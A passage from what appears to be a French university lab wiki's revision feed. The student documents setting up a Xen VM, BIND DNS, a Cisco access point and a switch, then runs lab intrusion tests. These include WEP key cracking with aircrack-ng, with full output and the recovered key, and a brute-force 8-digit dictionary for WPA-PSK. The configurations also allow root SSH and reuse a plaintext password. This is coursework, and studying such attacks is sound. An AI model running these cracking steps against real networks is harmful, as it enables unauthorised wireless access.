  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire toad59.space.dnssec pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56405</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56405"/>
				<updated>2021-11-19T11:07:38Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du site web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
